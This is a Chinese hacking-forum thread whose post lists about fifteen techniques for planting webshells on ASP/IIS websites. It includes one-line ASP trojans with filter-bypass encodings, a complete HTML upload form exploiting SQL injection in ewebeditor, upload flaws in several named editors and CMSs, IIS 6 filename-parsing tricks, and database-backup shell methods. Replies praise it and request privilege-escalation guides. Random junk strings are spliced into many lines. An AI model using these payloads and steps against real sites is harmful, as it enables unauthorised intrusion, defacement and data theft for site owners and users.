返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
$ y3 J! F6 L$ X
: k2 l" X& O; w6 ^  ~$ j8 H( e2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
( G" v4 Z2 e- ?9 M; X# _2 j3 `9 d* S9 W' g) q  p0 y& n& H
3.上传漏洞:. E% `6 `2 f1 C
/ H, c7 K" K& l$ F/ U/ ?7 b
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00; Y$ o1 R2 e# N! q  N$ [; G3 v& ^/ f
) H. K2 ~/ C1 w; J
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件9 a* V8 a1 k2 l9 j# [1 _: Z

1 j. D/ d* u3 H1 r8 p/ P+ X7 e雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
6 _2 p) B3 ]3 R' c然后在上传文件里面填要传的图片格式的ASP木马. X; p! t8 N+ O% k
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
4 f+ Q& ^3 t# a! S7 W* b) ?  `2 Q4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
1 s* b& {9 y! O% p- L7 W/ u( @2 ?3 O
/ B% h- V6 ?4 ]0 v% j<html>4 ?: M' Q' Z; ]7 a/ E
<head>
* H& K' R' z( d  Z# p<title>ewebeditor upload.asp上传利用</title>2 m$ Z0 v, @  e
</head>
" C5 d& H( Q2 i  z( C! G% |, f<body>% j$ _! \8 H6 ^7 @* @( z  N
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">+ R5 E+ j: }3 ~: f5 a
<input type=file name=uploadfile size=100><br><br>
$ G% q) d( h( o$ |6 {  j<input type=submit value=Fuck>
% e/ j1 P( x6 D3 m( i# ~</form>7 V* ^9 M+ N9 X5 f8 L( G
</body>
: ~* |9 a7 s9 Y</form>4 v7 |; T+ d5 p/ Z9 D
</html>
0 ~" f; `7 `% S  H8 h1 ^( r+ |* p0 H, x
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
8 J5 @, d0 H& j; S8 }5 @  ^5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp  m' k+ I' o0 V* m# p
% L6 o  _6 x  f; e  M& @
利用windows2003解析。建立zjq.asp的文件夹; }9 R5 D$ M. L

9 G5 Q" }. V. l5 f6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型/ D# V- [. f  z, s

4 ~+ J& o7 s4 t+ T7.cuteeditor:类似ewebeditor
' f' t& A/ q/ Q2 u; g6 m0 e$ F8 ]
8.htmleditor:同上5 f$ {8 Z( i: S9 k
* M1 I( X# X/ o. }5 T8 [
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
5 `, a# E; H0 j( H/ L# B7 _! ^7 U  x3 g$ x
<%execute request("value")%><%'<% loop <%:%>
2 }; j' p5 S7 ]( }/ n( _
8 c& S" s- W1 s# J<%'<% loop <%:%><%execute request("value")%>5 J2 d) J- M3 d) R# j1 Q% l

, D5 a  [% o4 O<%execute request("value")'<% loop <%:%>8 t! Y/ {' n) H! r( R' U
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
" Y& D$ K+ l# [; B! [( N- z) {, b$ H( y9 M  s( q* v; P
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞7 C* c8 H6 L3 h( s# f* z8 Q
. {: M  A7 E" _5 a4 R8 c% a, f
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
( r6 C! c1 Z& J* b: H8 N; s; p' g8 ~0 E8 _5 K! L% ~
解析漏洞得到webshell4 o6 _# w9 }6 }" q

+ U7 x$ g) V+ ^& H% ?5 b0 }12.mssql差异备份,日志备份,前提需知道web路径  R- K" V& Z) Z
0 Z2 f, M7 n6 a" m# u
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
- L0 ~$ I# S2 z' p, e: W. P8 s- j& x# c) V4 E6 [' Y; b3 w# ?4 E
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell4 q* j& i: v1 \  `  `

# L2 u& e( _3 D. v. x  @; p4 Z15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
3 F: [- U; F2 t3 ]# e
) g% p+ _+ G6 d& |$ V以上只是本人的一些拙见,并不完善,以后想到了再继续添加
" _  w4 J5 p' X, d9 Z/ v不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 " m. ]2 R0 P1 r

& W+ W% I) X& R$ ^0 x  i/ F& Y& K
$ n0 c# U# o3 r7 `; M很好啊、基本的入侵方法都包含了
8 r8 U5 J5 z3 N+ o8 l" x5 E+ ?3 F+ v2 Q- {! Y/ q2 A
最好来个提权的帖子再。/ v& B" g  R( Z4 P( {) f/ h

  [; a9 Q+ a# r4 ?8 v不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表